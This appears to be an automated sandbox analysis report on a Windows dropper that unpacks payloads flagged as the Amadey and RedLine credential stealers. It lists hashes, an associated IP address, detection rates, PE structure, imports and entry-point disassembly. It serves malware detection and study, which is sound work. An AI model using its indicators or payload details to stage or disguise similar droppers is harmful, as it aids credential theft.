                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:58:58 | API Interceptor | 8x Sleep call for process: bAS06bx.exe modified
Match:193.233.20.11
Associated Sample Name / URL | Detection
file.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
VBQy9nOOrQ.exe | malicious
R303azKUtn.exe | malicious
Em3CDPfYeh.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
file.exe | malicious
                                                                                                                                                                                                    No context
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                    REDCOM-ASRedcomKhabarovskRussiaRUfile.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 193.233.20.11
                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 193.233.20.11
                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 193.233.20.11
                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 193.233.20.11
                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 193.233.20.11
                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 193.233.20.11
                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 193.233.20.11
                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 193.233.20.11
                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 193.233.20.11
VBQy9nOOrQ.exe, Detection: malicious
• 193.233.20.11
R303azKUtn.exe, Detection: malicious
• 193.233.20.11
Em3CDPfYeh.exe, Detection: malicious
• 193.233.20.11
                                                                                                                                                                                                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe | file.exe | | malicious | |
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):226
                                                                                                                                                                                                                                            Entropy (8bit):5.354940450065058
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                                                            MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                                                            SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                                                            SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                                                            SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2843
                                                                                                                                                                                                                                            Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKAHK1Hl:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxm
                                                                                                                                                                                                                                            MD5:5EA9FF4B9AFE42ECFFADE5744166BB01
                                                                                                                                                                                                                                            SHA1:6851A3CFC6FFF6E84DCDD304955CD6FA9FE7A830
                                                                                                                                                                                                                                            SHA-256:D1BD60259D61BD4883CE280FC35E3231E37208A75A3F6B7EEE3951960D78887C
                                                                                                                                                                                                                                            SHA-512:908C41E1797D1F05409D26C6EAAD3E221366CEC193B355E70989DB0978DEC5B29A35B2F96FF13D78930B25DCC84189BC50ACBB35B13A702A2E99F8243A7F256F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):241664
                                                                                                                                                                                                                                            Entropy (8bit):6.368190069123744
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                                                                                                                                                                                            MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                                                                                                                                                                                            SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                                                                                                                                                                                            SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                                                                                                                                                                                            SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe, Author: Joe Security
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 81%, Browse
                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):607232
                                                                                                                                                                                                                                            Entropy (8bit):7.841087916123307
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:uMrCy90wxqthbfuiKw8SdabIxjQz6B2xdw1uJxSh3kME1G2CUF/U+6FN:0ybqzru481GyXw18ShUME0ENUN
                                                                                                                                                                                                                                            MD5:1EA737E1D6A95AA35583293A9A2F5347
                                                                                                                                                                                                                                            SHA1:6567BFB9A18BA4C87AC71C9C6809BB7B8306D874
                                                                                                                                                                                                                                            SHA-256:D9B8F5F6D998084352D32C3B972D7BE0A7F72750FC0546BCB0C49E83C31B7B42
                                                                                                                                                                                                                                            SHA-512:76B64C75E51E6972867B4C833C9A0DA51E96B9DADED08E3756B8B4ADE3A68B2A1ED0378F52DA7AE20A896C9041B52FC4B3B5DA3976EC8DB8CE1183D22D77B497
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 55%, Browse
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):458752
                                                                                                                                                                                                                                            Entropy (8bit):6.742236936953538
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:k8hg0pOvPd9Ak6GJFw13JNCrUw1PJnL8D1QkeeGSBs:kR0pOvPd9AkxXw13JxwnnLWQkeM
                                                                                                                                                                                                                                            MD5:987716B161B82E2E5A1F1B6BA4E8A1AA
                                                                                                                                                                                                                                            SHA1:C7B88BD06B5BEC63B254BA8B97D3357C35C44197
                                                                                                                                                                                                                                            SHA-256:1E7D370C1EF8E36A6687140A0DD3FFF36494A2F9DD3E98678CEF8C8EDB1BDA80
                                                                                                                                                                                                                                            SHA-512:76B7F90DFF7C3803B6C3EEDDE5782476372B446E1BBC17B62CAF447594BEC08FEB1A30C5644C7C03AC075BA4166EFF7A0C0966D7BA2FF2459B2349C701D78B9A
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 49%, Browse
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):206848
                                                                                                                                                                                                                                            Entropy (8bit):7.243915749634433
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:Kky+bnr+O1P5GWp1icKAArDZz4N9GhbkrNEk6Zhl1Jw5D+QMpv1DQoT8njrlYj:Kky+bnr+Ep0yN90QE/Dwpopv1DQPnjO
                                                                                                                                                                                                                                            MD5:156433A80D154CC7554D6D4E75C8E045
                                                                                                                                                                                                                                            SHA1:AB29D992421060987017AAC07DE0C70C08ACD5FA
                                                                                                                                                                                                                                            SHA-256:19BCAAA2C4C2328C3CC855899B8079CD693F5CD10767138822F4C184E96CACB6
                                                                                                                                                                                                                                            SHA-512:7EAED0DC8DC59B87DBDB2393FCA75E56646AE9A63AC50E98C2D21C06A215EDEB7E44DC7BB544EF23AF18127D0E3F2ED201C0C0D485173FD96FB04624A977C882
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 64%
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11264
                                                                                                                                                                                                                                            Entropy (8bit):4.97029807367379
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                                                                                                                                                                                            MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                            SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                                                                                                                                                                                            SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                                                                                                                                                                                            SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179200
                                                                                                                                                                                                                                            Entropy (8bit):4.951529552333406
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:OxqZWXragQx+/pnab8PeR5D+hb/xNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOuD:0qZWpnaQC+h
                                                                                                                                                                                                                                            MD5:EF8079CF160510D0DA7162BC08F753D8
                                                                                                                                                                                                                                            SHA1:E786CC8BEE83E4A37433DDCCF9D3540E1F6533FE
                                                                                                                                                                                                                                            SHA-256:A6416CA607F03E7D02DD9C8B546113C71F421C0BA8438DAFB941D25F8CF2C9E6
                                                                                                                                                                                                                                            SHA-512:959B08126358527B794A276F6E9F818250F888D9F108B46766F6C2E50186ACC8F406ACBEB94CA97B5F0E329B27F3851003446715D5D040B5C0FEF4010011A2C3
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, Author: ditekSHen
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.893905919977697
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 798720
MD5: e46fc629e1740020f4cb10f793d38689
SHA1: b0bc2f9f5ad244c3c15160b389a66252adab9e0c
SHA256: f488772ca9291e830b797022be6c0c808e8963654276eb7c2c117279b41b69af
SHA512: d609c308b0845af692de0ab50652833d6521cf32b5407d7b3911b31002390fd3cd0fae7a1520efb4f5309eabdff540324ddc1613cf11ef195e8d278a3c44d128
SSDEEP: 24576:lyMVZzgFu582HFLw5EPhnME7sNUmocom3:AMPzgFAZZn/7XmVom
TLSH: FE05120BEBF98432E8F2837448FA07C31A367E65577883A6235F6D2918236B4A175717
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
Icon Hash: f8e0e4e8ecccc870
Entrypoint: 0x406a60
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 10
OS Version Minor: 0
File Version Major: 10
File Version Minor: 0
Subsystem Version Major: 10
Subsystem Version Minor: 0
Import Hash: 646167cce332c1c252cdcb1839e0cf48
Instruction
call 00007F2674C55195h
jmp 00007F2674C54AA5h
push 00000058h
push 004072B8h
call 00007F2674C55237h
xor ebx, ebx
mov dword ptr [ebp-20h], ebx
lea eax, dword ptr [ebp-68h]
push eax
call dword ptr [0040A184h]
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov esi, dword ptr [eax+04h]
mov edi, ebx
mov edx, 004088ACh
mov ecx, esi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007F2674C54ABAh
cmp eax, esi
jne 00007F2674C54AA9h
xor esi, esi
inc esi
mov edi, esi
jmp 00007F2674C54AB2h
push 000003E8h
call dword ptr [0040A188h]
jmp 00007F2674C54A79h
xor esi, esi
inc esi
cmp dword ptr [004088B0h], esi
jne 00007F2674C54AACh
push 0000001Fh
call 00007F2674C54FCBh
pop ecx
jmp 00007F2674C54ADCh
cmp dword ptr [004088B0h], ebx
jne 00007F2674C54ACEh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007F2674C54BF6h
pop ecx
pop ecx
test eax, eax
je 00007F2674C54AB9h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007F2674C54BD9h
mov dword ptr [004081E4h], esi
cmp dword ptr [004088B0h], esi
jne 00007F2674C54ABDh
push 004010B4h
push 004010ACh
call 00007F2674C55185h
pop ecx
pop ecx
mov dword ptr [000088B0h], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0xba8b4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc7000 | 0x888 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0xbb000 | 0xbaa00 | False | 0.9502155894172807 | data | 7.9217119746488125 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc7000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States
RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States
RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States
RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia
RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States
RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia
RT_DIALOG | 0x250f4 | 0x166 | data | English | United States
                                                                                                                                                                                                                                            RT_DIALOG0x2525c0x168dataRussianRussia
                                                                                                                                                                                                                                            RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                                                                                                                                                                                            RT_DIALOG0x255840x1e0dataRussianRussia
                                                                                                                                                                                                                                            RT_DIALOG0x257640x130dataEnglishUnited States
                                                                                                                                                                                                                                            RT_DIALOG0x258940x150dataRussianRussia
                                                                                                                                                                                                                                            RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                                                                                                                                                                                            RT_DIALOG0x25b040x122dataRussianRussia
                                                                                                                                                                                                                                            RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                                                                                                                                                                                            RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x2625c0x52edataRussianRussia
                                                                                                                                                                                                                                            RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x26d580x592dataRussianRussia
                                                                                                                                                                                                                                            RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x2779c0x4b2dataRussianRussia
                                                                                                                                                                                                                                            RT_STRING0x27c500x44adataEnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x2809c0x43edataRussianRussia
                                                                                                                                                                                                                                            RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x288ac0x2fcdataRussianRussia
                                                                                                                                                                                                                                            RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0x28bb00x9cbd8Microsoft Cabinet archive data, many, 642008 bytes, 2 files, at 0x2c +A "fuN31PL.exe" +A "dXL24Wx.exe", ID 1862, number 1, 26 datablocks, 0x1503 compressionEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57880x4dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc578c0x24dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57b00x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57b80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57c00x4dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57c40xcdataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57d00x4dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57d40xcdataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57e00x4dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57e40x6dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57ec0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57f40x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                            RT_GROUP_ICON0xc57fc0xbcdataEnglishUnited States
                                                                                                                                                                                                                                            RT_VERSION0xc58b80x408dataEnglishUnited States
                                                                                                                                                                                                                                            RT_VERSION0xc5cc00x410dataRussianRussia
                                                                                                                                                                                                                                            RT_MANIFEST0xc60d00x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll | GetDeviceCaps
USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll
Cabinet.dll
VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
Language of compilation system | Country where language is spoken | Map
English | United States
Russian | Russia
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
